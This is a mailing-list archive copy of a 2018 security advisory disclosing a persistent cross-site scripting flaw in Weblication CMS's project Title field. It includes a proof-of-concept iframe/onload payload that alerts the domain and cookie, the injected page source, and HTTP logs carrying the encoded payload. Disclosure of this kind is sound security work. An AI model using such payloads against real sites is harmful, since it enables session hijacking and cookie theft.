[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Weblication CMS Core & Grid v12.6.24 - Multiple Cross Site Scripting Vulnerabilities
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2018-03-27 12:51:21
Message-ID: ece3d9bb-255b-27ed-abde-babbf944923e () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
Weblication CMS Core & Grid v12.6.24 - Multiple Cross Site Scripting Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2121
Release Date:
=============
2018-02-21
Vulnerability Laboratory ID (VL-ID):
====================================
2121
Common Vulnerability Scoring System:
====================================
3.5
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
https://help.weblication.de/help12/
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site \
vulnerability in the official Weblication CMS Core & Grid v12.006.024 CMS.
Vulnerability Disclosure Timeline:
==================================
2018-02-21: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
A persistent cross site scripting vulnerability has been discovered in the official \
Weblication CMS Core & Grid v12.006.024 CMS. The vulnerability allows remote \
attackers to inject own malicious script codes to the application-side of the service \
to compromise sensitive user data or affected web-application contents.
The security vulnerability is located in the `wFilemanager.php` & `index.php` files \
of the `/grid5/scripts/` modules. The injection point is located in the Project \
`Title` and the execution point occurs in the `Inhaltsprojekte` output listing \
section. Remote attackers with privileged user accounts are able to inject own \
malicious script code with persistent attack vector to compromise user session \
credentials or to manipulate the affected web-application module output context. The \
request method to inject is POST and the attack vector is reflected. The injection \
point is located in the project Title and the execution point occurs in the \
Inhaltsprojekte output listing section.
Successful exploitation of the vulnerability results in session hijacking, persistent \
phishing attacks, persistent external redirects to malicious source and persistent \
manipulation of affected or connected application modules.
Request Method(s):
[+] POST
Vulnerable File(s):
[+] index.php
[+] wFilemanager.php
Vulnerable Input Field(s):
[+] Title
Affected Module(s):
[+] Inhaltsprojekte
Proof of Concept (PoC):
=======================
The persistent vulnerability can be exploited by remote attackers with low privilege \
web-application user account and low user interaction. For security demonstration or \
to reproduce the vulnerability follow the provided information and steps below to \
continue.
PoC Inject: Title
https://grid.localhost:8080/weblication/grid5/scripts/wFilemanager.php?action=showMaskEditOptionsProject&path=/img-src-x-img-img-src-x-img-
PoC Execute: Inhaltsprojekte
https://grid.localhost:8080/weblication/grid5/apps/wEditorWd8/index.php?path=/default-wGlobal/wGlobal/content/variables/
default.wVariables.php&target=be&selectedTab=&display=&action=startedit&referrer=%2Fde%2Findex.php&redirectEndEdit=&showFileOptions=&anchor=
PoC: Payload
"><iframe src="evil.source" onload=alert(document.domain)>%20"><iframe \
src="evil.source" onload=alert(document.cookie)></iframe></iframe>
PoC: Vulnerable Source
<div style="width:936px;padding-bottom:32px"><div \
class="headline">Projektbasis</div><div class="variableEntry" data-key="base_source" \
data-project=""><div class="cellCaption">Projekt basiert auf </div><div \
class="cellValue" style=""><div class="wWebtagTextEditorInput"><input \
id="webtag_text_639020500" name="webtag_text_639020500" data-weditortype="input" \
class="wEditorText" style="" value="default/0.9.latest" tabindex=""></div></div><div \
class="cellKey">base_source</div></div> <div class="variableEntry" \
data-key="base_sources_additional" data-project=""><div \
class="cellCaption">Zusätzliche Weblics Quellen </div> <div class="cellValue" \
style=""><div class="wWebtagTextEditorInput"><input id="webtag_text_961851163" \
name="webtag_text_961851163" data-weditortype="input" class="wEditorText" style="" \
value="" tabindex=""></div></div><div \
class="cellKey">base_sources_additional</div></div> <div class="info">z.B. \
password@http://IHREDOMAIN/vorlageprojekt</div><div \
class="headline">Inhaltsprojekte</div><div class="cellCaption"> </div><div \
class="cellValue"><div style="padding-bottom:8px"><div class="wui-button \
wui-button-options" style="cursor:pointer" \
onclick="showMaskEditProjectOptions('/de')"><div style="line-height:15px"><span>/de \
<span style="color:#888888">Inhalte</span></span></div></div> <div class="wui-button \
wui-button-options" style="cursor:pointer" \
onclick="showMaskEditProjectOptions('/img-src-x-img-img-src-x-img-')"> <div \
style="line-height:15px"><span>/img-src-x-img-img-src-x-img- <span \
style="color:#888888">"><iframe src="evil.source" \
onload="alert(document.domain)">%20"><iframe src="evil.source" \
onload=alert(document.cookie)></span> </div></div></div></div><div class="cellKey"> \
</div><div class="info">Neben den globalen Projekteinstellungen können Sie weitere \
Einstellungen in den jeweiligen Inhalts- bzw. Sprachprojekten vornehmen.</div><div \
class="headline">Logo</div><div class="variableEntry" data-key="logo_src" \
data-project=""><div class="cellCaption">Logo </div>
PoC: Session Logs
Status: 200[OK]
POST https://grid.localhost:8080/weblication/grid5/scripts/wFilemanager.php?action=showMaskEditOptionsProject&path=/img-src-x-img-img-src-x-img- \
Mime Type[text/html]
Request Header:
Host[grid.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 \
Firefox/56.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Content-Type[application/x-www-form-urlencoded]
Content-Length[596]
Referer[https://grid.localhost:8080/weblication/grid5/scripts/wFilemanager.php?action=showMaskEditOptionsProject&path=/img-src-x-img-img-src-x-img-]
Cookie[WSESSIONID=2a3af57351f0a4ea3cbdd39ac5763954; wCc=1; \
lastCheckUpdate=1518869664242; lastVersion=012.006.024.000] Connection[keep-alive]
Upgrade-Insecure-Requests[1]
POST-Daten:
action[editOptionsProject]
path[%2Fimg-src-x-img-img-src-x-img-]
title[%22%3E%3Ciframe+src%3D%22evil.source%22+onload%3Dalert%28document.domain%29%3E%2520%
22%3E%3Ciframe+src%3D%22evil.source%22+onload%3Dalert%28document.cookie%29%3E]
pathProjectGlobal[%2Fdefault-wGlobal]
pathProjectLayout[]
language[br]
projectConnect[%2Fimg-src-x-img-img-src-x-img-]
hostOnly[]
pageOffline[%2Fimg-src-x-img-img-src-x-img-%2FwGlobal%2Fcontent%2Ferrordocs%2Foffline.php]
permissionDenied[%2Fimg-src-x-img-img-src-x-img-%2FwGlobal%2Fcontent%2Ferrordocs%2Fpermission-denied.php]
W_PRETMP_groups%5B%5D[%5BW_ID%5D]
backupGroup[]
Response Header:
Server[Apache/2.4.27]
X-Powered-By[PHP/7.0.20]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate]
Vary[Accept-Encoding]
Keep-Alive[timeout=5, max=100]
Connection[Keep-Alive]
Transfer-Encoding[chunked]
Content-Type[text/html; charset=UTF-8]
-
Status: 200[OK]
GET https://grid.localhost:8080/weblication/grid5/scripts/wFilemanager.php?action=showMaskEditOptionsProject&path=/img-src-x-img-img-src-x-img- \
Mime Type[text/html]
Request Header:
Host[grid.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 \
Firefox/56.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Referer[https://grid.localhost:8080/weblication/grid5/apps/wEditorWd8/index.php?action=showfileedit&path=/default-wGlobal/
wGlobal/content/variables/default.wVariables.php&target=be&referrer=/de/index.php&display=default&editsource=&hasPlaceholdersToInsert=0]
Cookie[WSESSIONID=2a3af57351f0a4ea3cbdd39ac5763954; wCc=1; \
lastCheckUpdate=1518869664242; lastVersion=012.006.024.000] Connection[keep-alive]
Upgrade-Insecure-Requests[1]
Response Header:
Server[Apache/2.4.27]
X-Powered-By[PHP/7.0.20]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate]
Pragma[no-cache]
Content-Encoding[gzip]
Vary[Accept-Encoding]
Keep-Alive[timeout=5, max=97]
Connection[Keep-Alive]
Transfer-Encoding[chunked]
Content-Type[text/html; charset=UTF-8]
-
Status: 200[OK]
GET https://grid.localhost:8080/weblication/grid5/scripts/wEventmanager.php?action=showEvents&path=/img-src-x-img-img-src-x-img-&type=project&target=embed \
Mime Type[text/html]
Request Header:
Host[grid.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 \
Firefox/56.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Referer[https://grid.localhost:8080/weblication/grid5/scripts/wFilemanager.php?action=showMaskEditOptionsProject&path=/img-src-x-img-img-src-x-img-]
Cookie[WSESSIONID=2a3af57351f0a4ea3cbdd39ac5763954; wCc=1; \
lastCheckUpdate=1518869664242; lastVersion=012.006.024.000] Connection[keep-alive]
Upgrade-Insecure-Requests[1]
Response Header:
Server[Apache/2.4.27]
X-Powered-By[PHP/7.0.20]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate]
Pragma[no-cache]
Keep-Alive[timeout=5, max=96]
Connection[Keep-Alive]
Transfer-Encoding[chunked]
Content-Type[text/html; charset=UTF-8]
Reference(s):
https://grid.localhost:8080/
https://grid.localhost:8080/weblication/
https://grid.localhost:8080/weblication/grid5/
https://grid.localhost:8080/weblication/grid5/scripts/
https://grid.localhost:8080/weblication/grid5/scripts/wFilemanager.php
Solution - Fix & Patch:
=======================
The vulnerability can be resolved by a sanitize of the delivered input through the \
wFilemanager.php file. Parse in the output location the execution point in the \
Inhaltsprojekte to resolve the issue.
Security Risk:
==============
The security risk of the persistent cross site scripting vulnerability in the \
web-application is estimated as medium (cvss 3.5).
Credits & Authors:
==================
Benjamin K.M. [research@vulnerability-lab.com] - \
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including \
the warranties of merchantability and capability for a particular purpose. \
Vulnerability-Lab or its suppliers are not liable in any case of damage, including \
direct, indirect, incidental, consequential loss of business profits or special \
damages, even if Vulnerability Labs or its suppliers have been advised of the \
possibility of such damages. Some states do not allow the exclusion or limitation of \
liability mainly for incidental or consequential damages so the foregoing limitation \
may not apply. We do not approve or encourage anybody to break any licenses, \
policies, deface websites, hack into databases or trade with stolen data. We have no \
need for criminal activities or membership requests. We do not publish advisories or \
vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups \
or individuals. We do not publish trade researcher mails, phone numbers, \
conversations or anything else to journalists, investigative authorities or private \
individuals.
Domains: www.vulnerability-lab.com - www.vulnerability-db.com - \
www.evolution-sec.com
Programs: vulnerability-lab.com/submit.php - \
vulnerability-lab.com/list-of-bug-bounty-programs.php - \
vulnerability-lab.com/register.php
Feeds: vulnerability-lab.com/rss/rss.php - \
vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Any modified copy or reproduction, including partially usages, of this file, \
resources or information requires authorization from Vulnerability Laboratory. \
Permission to electronically redistribute this alert in its unmodified form is \
granted. All other rights, including the use of other media, are reserved by \
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, \
source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list, modify, \
use or edit our material contact (admin@) to get an ask permission.
Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]â„¢
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic